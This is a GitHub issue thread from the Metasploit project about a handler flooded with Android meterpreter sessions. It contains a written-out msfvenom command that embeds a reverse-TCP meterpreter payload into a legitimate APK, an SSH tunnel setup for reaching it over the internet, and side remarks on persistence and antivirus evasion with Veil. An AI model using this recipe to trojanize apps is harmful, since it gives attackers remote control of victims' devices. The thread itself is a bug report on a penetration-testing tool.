Metasploit-framework: Too many meterpreter sessions on payload execution
Steps to reproduce
How'd you do it?
- used a apk file to encode with msfvenom
msfvenom -p android/meterpreter_reverse_tcp -x /root/Original.apk -e shikata_ga_nai -i 5 -b '\x00' LHOST=myssh LPORT=7070 -o /root/Hacked.apk - execute apk on android and started reverse handler on msf with payload as android/meterpreter_reverse_tcp LHOST as 0.0.0.0 LPORT as 7777
- ssh -R 7070:localhost:7777 myssh
This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
Expected behavior
should get 1 or 2 meterpreter shells and automatically drop into shell for interaction
Current behavior
msf exploit(multi/handler) > sessions -i
Active sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
33 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52516 (127.0.0.1)
34 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52520 (127.0.0.1)
36 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52528 (127.0.0.1)
37 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52532 (127.0.0.1)
38 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52536 (127.0.0.1)
39 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52540 (127.0.0.1)
40 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52544 (127.0.0.1)
41 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52548 (127.0.0.1)
42 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52552 (127.0.0.1)
43 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52556 (127.0.0.1)
msf exploit(multi/handler) > [] 127.0.0.1 - Meterpreter session 33 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 34 closed. Reason: Died
[] Meterpreter session 44 opened (127.0.0.1:7777 -> 127.0.0.1:52566) at 2018-06-16 13:11:43 +0530
[] 127.0.0.1 - Meterpreter session 37 closed. Reason: Died
[] Meterpreter session 45 opened (127.0.0.1:7777 -> 127.0.0.1:52576) at 2018-06-16 13:11:54 +0530
[] 127.0.0.1 - Meterpreter session 42 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 36 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 38 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 39 closed. Reason: Died
[] Meterpreter session 46 opened (127.0.0.1:7777 -> 127.0.0.1:52670) at 2018-06-16 13:13:11 +0530
[] 127.0.0.1 - Meterpreter session 40 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 41 closed. Reason: Died
[] Meterpreter session 47 opened (127.0.0.1:7777 -> 127.0.0.1:52674) at 2018-06-16 13:13:14 +0530
[] Meterpreter session 48 opened (127.0.0.1:7777 -> 127.0.0.1:52678) at 2018-06-16 13:13:21 +0530
[] Meterpreter session 49 opened (127.0.0.1:7777 -> 127.0.0.1:52682) at 2018-06-16 13:13:24 +0530
[] Meterpreter session 50 opened (127.0.0.1:7777 -> 127.0.0.1:52686) at 2018-06-16 13:13:31 +0530
[] Meterpreter session 51 opened (127.0.0.1:7777 -> 127.0.0.1:52690) at 2018-06-16 13:13:34 +0530
[] 127.0.0.1 - Meterpreter session 43 closed. Reason: Died
[] Meterpreter session 52 opened (127.0.0.1:7777 -> 127.0.0.1:52694) at 2018-06-16 13:13:47 +0530
[] Meterpreter session 53 opened (127.0.0.1:7777 -> 127.0.0.1:52698) at 2018-06-16 13:13:49 +0530
[] Meterpreter session 54 opened (127.0.0.1:7777 -> 127.0.0.1:52702) at 2018-06-16 13:13:57 +0530
[] Meterpreter session 55 opened (127.0.0.1:7777 -> 127.0.0.1:52706) at 2018-06-16 13:14:00 +0530
[] Meterpreter session 56 opened (127.0.0.1:7777 -> 127.0.0.1:52734) at 2018-06-16 13:14:08 +0530
[] Meterpreter session 57 opened (127.0.0.1:7777 -> 127.0.0.1:52738) at 2018-06-16 13:14:10 +0530
[] Meterpreter session 58 opened (127.0.0.1:7777 -> 127.0.0.1:52742) at 2018-06-16 13:14:18 +0530
[] Meterpreter session 59 opened (127.0.0.1:7777 -> 127.0.0.1:52746) at 2018-06-16 13:14:21 +0530
[] Meterpreter session 60 opened (127.0.0.1:7777 -> 127.0.0.1:52750) at 2018-06-16 13:14:28 +0530
[] Meterpreter session 61 opened (127.0.0.1:7777 -> 127.0.0.1:52756) at 2018-06-16 13:14:31 +0530
[] Meterpreter session 62 opened (127.0.0.1:7777 -> 127.0.0.1:52816) at 2018-06-16 13:14:39 +0530
[] Meterpreter session 63 opened (127.0.0.1:7777 -> 127.0.0.1:52828) at 2018-06-16 13:14:41 +0530
[] 127.0.0.1 - Meterpreter session 44 closed. Reason: Died
[] Meterpreter session 64 opened (127.0.0.1:7777 -> 127.0.0.1:52832) at 2018-06-16 13:14:49 +0530
[] Meterpreter session 65 opened (127.0.0.1:7777 -> 127.0.0.1:52836) at 2018-06-16 13:14:51 +0530
[] 127.0.0.1 - Meterpreter session 45 closed. Reason: Died
[] Meterpreter session 66 opened (127.0.0.1:7777 -> 127.0.0.1:52840) at 2018-06-16 13:14:59 +0530
[] Meterpreter session 67 opened (127.0.0.1:7777 -> 127.0.0.1:52844) at 2018-06-16 13:15:02 +0530
[] Meterpreter session 68 opened (127.0.0.1:7777 -> 127.0.0.1:52848) at 2018-06-16 13:15:10 +0530
[] Meterpreter session 69 opened (127.0.0.1:7777 -> 127.0.0.1:52852) at 2018-06-16 13:15:12 +0530
[] 127.0.0.1 - Meterpreter session 47 closed. Reason: Died
[] Meterpreter session 70 opened (127.0.0.1:7777 -> 127.0.0.1:52880) at 2018-06-16 13:15:20 +0530
[] Meterpreter session 71 opened (127.0.0.1:7777 -> 127.0.0.1:52884) at 2018-06-16 13:15:22 +0530
[] Meterpreter session 72 opened (127.0.0.1:7777 -> 127.0.0.1:52888) at 2018-06-16 13:15:30 +0530
[] Meterpreter session 73 opened (127.0.0.1:7777 -> 127.0.0.1:52892) at 2018-06-16 13:15:33 +0530
[] Meterpreter session 74 opened (127.0.0.1:7777 -> 127.0.0.1:52896) at 2018-06-16 13:15:40 +0530
[] Meterpreter session 75 opened (127.0.0.1:7777 -> 127.0.0.1:52900) at 2018-06-16 13:15:43 +0530
[] Meterpreter session 76 opened (127.0.0.1:7777 -> 127.0.0.1:52904) at 2018-06-16 13:15:51 +0530
[] Meterpreter session 77 opened (127.0.0.1:7777 -> 127.0.0.1:52908) at 2018-06-16 13:15:53 +0530
[] Meterpreter session 78 opened (127.0.0.1:7777 -> 127.0.0.1:52912) at 2018-06-16 13:16:01 +0530
[] Meterpreter session 79 opened (127.0.0.1:7777 -> 127.0.0.1:52916) at 2018-06-16 13:16:03 +0530
[] 127.0.0.1 - Meterpreter session 56 closed. Reason: Died
[] Meterpreter session 80 opened (127.0.0.1:7777 -> 127.0.0.1:52928) at 2018-06-16 13:16:11 +0530
[] 127.0.0.1 - Meterpreter session 46 closed. Reason: Died
[] Meterpreter session 81 opened (127.0.0.1:7777 -> 127.0.0.1:52934) at 2018-06-16 13:16:14 +0530
[] 127.0.0.1 - Meterpreter session 59 closed. Reason: Died
[] Meterpreter session 82 opened (127.0.0.1:7777 -> 127.0.0.1:52938) at 2018-06-16 13:16:21 +0530
[] 127.0.0.1 - Meterpreter session 48 closed. Reason: Died
[] Meterpreter session 83 opened (127.0.0.1:7777 -> 127.0.0.1:52942) at 2018-06-16 13:16:24 +0530
[] 127.0.0.1 - Meterpreter session 49 closed. Reason: Died
[] Meterpreter session 84 opened (127.0.0.1:7777 -> 127.0.0.1:52946) at 2018-06-16 13:16:32 +0530
[] 127.0.0.1 - Meterpreter session 50 closed. Reason: Died
[] Meterpreter session 85 opened (127.0.0.1:7777 -> 127.0.0.1:52950) at 2018-06-16 13:16:34 +0530
[] 127.0.0.1 - Meterpreter session 51 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 62 closed. Reason: Died
[] Meterpreter session 86 opened (127.0.0.1:7777 -> 127.0.0.1:52954) at 2018-06-16 13:16:42 +0530
[] Meterpreter session 87 opened (127.0.0.1:7777 -> 127.0.0.1:52958) at 2018-06-16 13:16:45 +0530
[] 127.0.0.1 - Meterpreter session 52 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 53 closed. Reason: Died
[] Meterpreter session 88 opened (127.0.0.1:7777 -> 127.0.0.1:52962) at 2018-06-16 13:16:53 +0530
[] Meterpreter session 89 opened (127.0.0.1:7777 -> 127.0.0.1:52966) at 2018-06-16 13:16:55 +0530
[] 127.0.0.1 - Meterpreter session 54 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 55 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 67 closed. Reason: Died
[] Meterpreter session 90 opened (127.0.0.1:7777 -> 127.0.0.1:52970) at 2018-06-16 13:17:03 +0530
[] Meterpreter session 91 opened (127.0.0.1:7777 -> 127.0.0.1:52974) at 2018-06-16 13:17:05 +0530
[] 127.0.0.1 - Meterpreter session 57 closed. Reason: Died
[] Meterpreter session 92 opened (127.0.0.1:7777 -> 127.0.0.1:52978) at 2018-06-16 13:17:14 +0530
[] Meterpreter session 93 opened (127.0.0.1:7777 -> 127.0.0.1:52982) at 2018-06-16 13:17:15 +0530
[] 127.0.0.1 - Meterpreter session 58 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 70 closed. Reason: Died
[] Meterpreter session 94 opened (127.0.0.1:7777 -> 127.0.0.1:52986) at 2018-06-16 13:17:24 +0530
[] Meterpreter session 95 opened (127.0.0.1:7777 -> 127.0.0.1:52994) at 2018-06-16 13:17:26 +0530
[] 127.0.0.1 - Meterpreter session 60 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 61 closed. Reason: Died
[] Meterpreter session 96 opened (127.0.0.1:7777 -> 127.0.0.1:52998) at 2018-06-16 13:17:34 +0530
[] Meterpreter session 97 opened (127.0.0.1:7777 -> 127.0.0.1:53002) at 2018-06-16 13:17:36 +0530
Interrupt: use the 'exit' command to quit
msf exploit(multi/handler) > sessions -i[] 127.0.0.1 - Meterpreter session 74 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 63 closed. Reason: Died
Interrupt: use the 'exit' command to quit
[] 127.0.0.1 - Meterpreter session 75 closed. Reason: Died
msf exploit(multi/handler) > sessions -i[*] Meterpreter session 98 opened (127.0.0.1:7777 -> 127.0.0.1:53006) at 2018-06-16 13:17:45 +0530
Active sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
64 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52832 (127.0.0.1)
65 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52836 (127.0.0.1)
66 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52840 (127.0.0.1)
68 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52848 (127.0.0.1)
69 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52852 (127.0.0.1)
71 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52884 (127.0.0.1)
72 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52888 (127.0.0.1)
73 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52892 (127.0.0.1)
76 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52904 (127.0.0.1)
77 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52908 (127.0.0.1)
78 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52912 (127.0.0.1)
79 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52916 (127.0.0.1)
80 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52928 (127.0.0.1)
81 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52934 (127.0.0.1)
82 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52938 (127.0.0.1)
83 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52942 (127.0.0.1)
84 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52946 (127.0.0.1)
85 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52950 (127.0.0.1)
86 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52954 (127.0.0.1)
87 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52958 (127.0.0.1)
88 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52962 (127.0.0.1)
89 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52966 (127.0.0.1)
90 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52970 (127.0.0.1)
91 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52974 (127.0.0.1)
92 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52978 (127.0.0.1)
93 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52982 (127.0.0.1)
94 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52986 (127.0.0.1)
95 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52994 (127.0.0.1)
96 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:52998 (127.0.0.1)
97 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:53002 (127.0.0.1)
98 meterpreter java/android 127.0.0.1:7777 -> 127.0.0.1:53006 (127.0.0.1)
msf exploit(multi/handler) > [] Meterpreter session 99 opened (127.0.0.1:7777 -> 127.0.0.1:53010) at 2018-06-16 13:17:46 +0530
[] 127.0.0.1 - Meterpreter session 64 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 76 closed. Reason: Died
Interrupt: use the 'exit' command to quit
msf exploit(multi/handler) > se[] 127.0.0.1 - Meterpreter session 65 closed. Reason: Died
ssions[] 127.0.0.1 - Meterpreter session 77 closed. Reason: Died
[] Meterpreter session 100 opened (127.0.0.1:7777 -> 127.0.0.1:53014) at 2018-06-16 13:17:55 +0530
9[] Meterpreter session 101 opened (127.0.0.1:7777 -> 127.0.0.1:53018) at 2018-06-16 13:17:57 +0530
0
[] Starting interaction with 90...
meterpreter > ?
Core Commands
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > [] 127.0.0.1 - Meterpreter session 66 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 78 closed. Reason: Died
bg[] 127.0.0.1 - Meterpreter session 79 closed. Reason: Died
lis[] Meterpreter session 102 opened (127.0.0.1:7777 -> 127.0.0.1:53022) at 2018-06-16 13:18:05 +0530
t
meterpreter > [] Meterpreter session 103 opened (127.0.0.1:7777 -> 127.0.0.1:53026) at 2018-06-16 13:18:07 +0530
[] 127.0.0.1 - Meterpreter session 68 closed. Reason: Died
Interrupt: use the 'exit' command to quit
meterpreter > [] 127.0.0.1 - Meterpreter session 80 closed. Reason: Died
exit[] 127.0.0.1 - Meterpreter session 69 closed. Reason: Died
[*] Shutting down Meterpreter...
[] 127.0.0.1 - Meterpreter session 90 closed. Reason: User exit
msf exploit(multi/handler) > [] 127.0.0.1 - Meterpreter session 81 closed. Reason: Died
[] Meterpreter session 104 opened (127.0.0.1:7777 -> 127.0.0.1:53030) at 2018-06-16 13:18:17 +0530
[] Meterpreter session 105 opened (127.0.0.1:7777 -> 127.0.0.1:53034) at 2018-06-16 13:18:17 +0530
[] 127.0.0.1 - Meterpreter session 82 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 71 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 83 closed. Reason: Died
[] Meterpreter session 106 opened (127.0.0.1:7777 -> 127.0.0.1:53038) at 2018-06-16 13:18:27 +0530
[] Meterpreter session 107 opened (127.0.0.1:7777 -> 127.0.0.1:53042) at 2018-06-16 13:18:28 +0530
[] 127.0.0.1 - Meterpreter session 72 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 84 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 73 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 85 closed. Reason: Died
[] Meterpreter session 108 opened (127.0.0.1:7777 -> 127.0.0.1:53046) at 2018-06-16 13:18:38 +0530
[] Meterpreter session 109 opened (127.0.0.1:7777 -> 127.0.0.1:53050) at 2018-06-16 13:18:38 +0530
[] 127.0.0.1 - Meterpreter session 86 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 87 closed. Reason: Died
[] Meterpreter session 110 opened (127.0.0.1:7777 -> 127.0.0.1:53054) at 2018-06-16 13:18:48 +0530
[] Meterpreter session 111 opened (127.0.0.1:7777 -> 127.0.0.1:53058) at 2018-06-16 13:18:48 +0530
[] 127.0.0.1 - Meterpreter session 88 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 89 closed. Reason: Died
[] Meterpreter session 112 opened (127.0.0.1:7777 -> 127.0.0.1:53062) at 2018-06-16 13:18:58 +0530
[] Meterpreter session 113 opened (127.0.0.1:7777 -> 127.0.0.1:53066) at 2018-06-16 13:18:58 +0530
[] 127.0.0.1 - Meterpreter session 91 closed. Reason: Died
[] Meterpreter session 114 opened (127.0.0.1:7777 -> 127.0.0.1:53070) at 2018-06-16 13:19:09 +0530
[] Meterpreter session 115 opened (127.0.0.1:7777 -> 127.0.0.1:53074) at 2018-06-16 13:19:10 +0530
[] 127.0.0.1 - Meterpreter session 92 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 93 closed. Reason: Died
[] Meterpreter session 116 opened (127.0.0.1:7777 -> 127.0.0.1:53080) at 2018-06-16 13:19:22 +0530
[] Meterpreter session 117 opened (127.0.0.1:7777 -> 127.0.0.1:53086) at 2018-06-16 13:19:24 +0530
[] 127.0.0.1 - Meterpreter session 94 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 95 closed. Reason: Died
[] Meterpreter session 118 opened (127.0.0.1:7777 -> 127.0.0.1:53124) at 2018-06-16 13:19:29 +0530
[] Meterpreter session 119 opened (127.0.0.1:7777 -> 127.0.0.1:53128) at 2018-06-16 13:19:30 +0530
[] 127.0.0.1 - Meterpreter session 96 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 97 closed. Reason: Died
[] Meterpreter session 120 opened (127.0.0.1:7777 -> 127.0.0.1:53132) at 2018-06-16 13:19:40 +0530
[] Meterpreter session 121 opened (127.0.0.1:7777 -> 127.0.0.1:53136) at 2018-06-16 13:19:41 +0530
[] 127.0.0.1 - Meterpreter session 98 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 99 closed. Reason: Died
[] Meterpreter session 122 opened (127.0.0.1:7777 -> 127.0.0.1:53140) at 2018-06-16 13:19:50 +0530
[] Meterpreter session 123 opened (127.0.0.1:7777 -> 127.0.0.1:53144) at 2018-06-16 13:19:50 +0530
[] 127.0.0.1 - Meterpreter session 100 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 101 closed. Reason: Died
[] Meterpreter session 124 opened (127.0.0.1:7777 -> 127.0.0.1:53148) at 2018-06-16 13:20:00 +0530
[] Meterpreter session 125 opened (127.0.0.1:7777 -> 127.0.0.1:53152) at 2018-06-16 13:20:01 +0530
[] 127.0.0.1 - Meterpreter session 102 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 103 closed. Reason: Died
[] Meterpreter session 126 opened (127.0.0.1:7777 -> 127.0.0.1:53186) at 2018-06-16 13:20:11 +0530
[] Meterpreter session 127 opened (127.0.0.1:7777 -> 127.0.0.1:53188) at 2018-06-16 13:20:12 +0530
[] 127.0.0.1 - Meterpreter session 104 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 105 closed. Reason: Died
[] Meterpreter session 128 opened (127.0.0.1:7777 -> 127.0.0.1:53192) at 2018-06-16 13:20:21 +0530
[] Meterpreter session 129 opened (127.0.0.1:7777 -> 127.0.0.1:53196) at 2018-06-16 13:20:21 +0530
[] 127.0.0.1 - Meterpreter session 106 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 107 closed. Reason: Died
[] Meterpreter session 130 opened (127.0.0.1:7777 -> 127.0.0.1:53200) at 2018-06-16 13:20:31 +0530
[] Meterpreter session 131 opened (127.0.0.1:7777 -> 127.0.0.1:53204) at 2018-06-16 13:20:32 +0530
[] 127.0.0.1 - Meterpreter session 108 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 109 closed. Reason: Died
[] Meterpreter session 132 opened (127.0.0.1:7777 -> 127.0.0.1:53210) at 2018-06-16 13:20:41 +0530
[] Meterpreter session 133 opened (127.0.0.1:7777 -> 127.0.0.1:53214) at 2018-06-16 13:20:42 +0530
[] 127.0.0.1 - Meterpreter session 110 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 111 closed. Reason: Died
[] Meterpreter session 134 opened (127.0.0.1:7777 -> 127.0.0.1:53284) at 2018-06-16 13:20:52 +0530
[] Meterpreter session 135 opened (127.0.0.1:7777 -> 127.0.0.1:53288) at 2018-06-16 13:20:52 +0530
[] 127.0.0.1 - Meterpreter session 112 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 113 closed. Reason: Died
[] Meterpreter session 136 opened (127.0.0.1:7777 -> 127.0.0.1:53292) at 2018-06-16 13:21:02 +0530
[] Meterpreter session 137 opened (127.0.0.1:7777 -> 127.0.0.1:53296) at 2018-06-16 13:21:02 +0530
[] 127.0.0.1 - Meterpreter session 114 closed. Reason: Died
[] Meterpreter session 138 opened (127.0.0.1:7777 -> 127.0.0.1:53300) at 2018-06-16 13:21:12 +0530
[] Meterpreter session 139 opened (127.0.0.1:7777 -> 127.0.0.1:53304) at 2018-06-16 13:21:13 +0530
[] 127.0.0.1 - Meterpreter session 115 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 116 closed. Reason: Died
[] Meterpreter session 140 opened (127.0.0.1:7777 -> 127.0.0.1:53308) at 2018-06-16 13:21:23 +0530
[] Meterpreter session 141 opened (127.0.0.1:7777 -> 127.0.0.1:53312) at 2018-06-16 13:21:23 +0530
[] 127.0.0.1 - Meterpreter session 117 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 118 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 119 closed. Reason: Died
[] Meterpreter session 142 opened (127.0.0.1:7777 -> 127.0.0.1:53316) at 2018-06-16 13:21:33 +0530
[] Meterpreter session 143 opened (127.0.0.1:7777 -> 127.0.0.1:53320) at 2018-06-16 13:21:33 +0530
[] 127.0.0.1 - Meterpreter session 120 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 121 closed. Reason: Died
kali linux 2018.2
msf 4.16.61-dev
I installed Metasploit with:
- [ ] Kali package via apt
OS
KALI 2018.2
xmagickx
All 17 comments
On my ssh terminal output is:
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
TCP connection from x.x.x.x on port 7070
xmagickx
on 16 Jun 2018
Try set LHOST mysshhost on the handler
timwr
on 16 Jun 2018
Handler will not be able to bind to myssh as LHOST because it is on a remote
server... Will try it...
On Sat 16 Jun, 2018, 4:35 PM Tim, notifications@github.com wrote:
Try set LHOST mysshhost on the handler
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/10181#issuecomment-397804893,
or mute the thread
https://github.com/notifications/unsubscribe-auth/Af5qNHkfAOhMVZr8lIL2rmQs4769Ikioks5t9OZzgaJpZM4UqZpA
.
xmagickx
on 16 Jun 2018
Handler failed to bind to myssh:7070 started reverse handler on 0.0.0.0:7070.....
l did not (& will not) get any sessions using this because I forwarded myssh:7070 port to localhost:7777 on which the handler is listening. And the apk payload will connect back to myssh @ port 7070 which will forward the connection to localhost @ 7777
On Sat 16 Jun, 2018, 8:31 PM Ranjan Mallick, xmagickx@gmail.com wrote:
Handler will not be able to bind to myssh as LHOST because it is a remote
server... Will try it...On Sat 16 Jun, 2018, 4:35 PM Tim, notifications@github.com wrote:
Try set LHOST mysshhost on the handler
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/10181#issuecomment-397804893,
or mute the thread
https://github.com/notifications/unsubscribe-auth/Af5qNHkfAOhMVZr8lIL2rmQs4769Ikioks5t9OZzgaJpZM4UqZpA
.
xmagickx
on 16 Jun 2018
Are you sure? It falls back to 0.0.0.0 which is what you had before.
timwr
on 17 Jun 2018
Yes it falls back to 0.0.0.0 because handler can't bind to a ssh server which is located on a remote server. My problem is not that I'm not getting a
session with my original settings... But I'm getting way too many sessions
& not dropping into a meterpreter shell...
On Sun 17 Jun, 2018, 10:38 AM Tim, notifications@github.com wrote:
Are you sure? It falls back to 0.0.0.0 which is what you had before.
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/10181#issuecomment-397855126,
or mute the thread
https://github.com/notifications/unsubscribe-auth/Af5qNM2GVNsU1pljXas5BQAmw5eIQPxNks5t9eRRgaJpZM4UqZpA
.
xmagickx
on 17 Jun 2018
I think the bug here is with msfvenom -x and stageless payloads, e.g: android/meterpreter_reverse_tcp. For now can you try with android/meterpreter/reverse_tcp please? I'll try fix the issue with injection.
timwr
on 6 Jul 2018
No I'm getting stdapi loaded sessions without any hitch in case of using
payloads of persistence.rb script of meterpreter over WAN ssh. Just that it
doesn't run again after reboots. But with .exe files compiled with veil and
easily evades AV, I get sessions across reboots using stageless payloads
but stdapi doesn't load. And sessions dies after 1 min. Maybe I'll try with
stageless payloads on Windows and let you know.
On Fri 6 Jul, 2018, 11:11 PM Tim, notifications@github.com wrote:
I think the bug here is with msfvenom -x and stageless payloads, e.g:
android/meterpreter_reverse_tcp. For now can you try with
android/meterpreter/reverse_tcp please? I'll try fix the issue with
injection.—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/10181#issuecomment-403101518,
or mute the thread
https://github.com/notifications/unsubscribe-auth/Af5qNERBF_sNXHzXTJY_wB_L-qfXC7ajks5uD6FSgaJpZM4UqZpA
.
xmagickx
on 7 Jul 2018
It just hangs there forever till I press enter. But then I got stdapi loaded meterpreter session on WAN using staged payloads. The problem was with using stageless payloads which didn't give me any stdapi session. Thank you so much @timwr for your patience and time.
On Sat 16 Jun, 2018, 4:35 PM Tim, notifications@github.com wrote:
Try set LHOST mysshhost on the handler
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/10181#issuecomment-397804893,
or mute the thread
https://github.com/notifications/unsubscribe-auth/Af5qNHkfAOhMVZr8lIL2rmQs4769Ikioks5t9OZzgaJpZM4UqZpA
.
xmagickx
on 7 Jul 2018
But what is wrong with stageless persistence payloads???
xmagickx
on 7 Jul 2018
led32
on 15 Mar 2019
hey.. i need help with this. anyone with a solution?
led32
on 15 Mar 2019
I'm having the same problem using ngrok tcp an i get this... bug ? am not sure what i did wrong
but not meterpreter session!?the thing is that I had already obtained a session before with this same method, maybe I did something wrong? if some one could help me i appreciate it
root-plex
on 28 Dec 2019
i think tool that can handle all those active session is Armitage
titholinux
on 3 May 2020
@timwr Looks like this issue might be occurring again, did you adjust anything last time you investigated this, or did you not get time to make the fixes?
gwillcox-r7
on 4 May 2020
So the original issue was that stageless payloads (e.g android/meterpreter_reverse_*) are not compatible with msfvenom -x. I haven't been able to fix that yet. For now I can add an error when both options are specified.
However this issue can also occur in other scenarios and on other payloads (for instance when the handler LHOST is set incorrectly).
timwr
on 4 May 2020
That issue occurs only when you use port forwarding e.g ngrok only in WAN.
but if perform the same thing in LAN and you set LHOST 192.168.. instead
of port forwarding that issue doesn't occur, BUT u get another issues which
is session terminate within few minutes
On Mon, May 4, 2020, 10:31 AM Tim notifications@github.com wrote:
So the original issue was that stageless payloads (e.g
android/meterpreter_reverse_*) are not compatible with msfvenom -x. I
haven't been able to fix that yet. For now I can add an error when both
options are specified.
However this issue can also occur in other scenarios and on other payloads
(for instance when the handler LHOST is set incorrectly).—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/10181#issuecomment-623304111,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AMM7R5HXHTLGOPYIH7S2DITRPZVNVANCNFSM4FFJTJAA
.
titholinux
on 4 May 2020
Related issues
nixawk
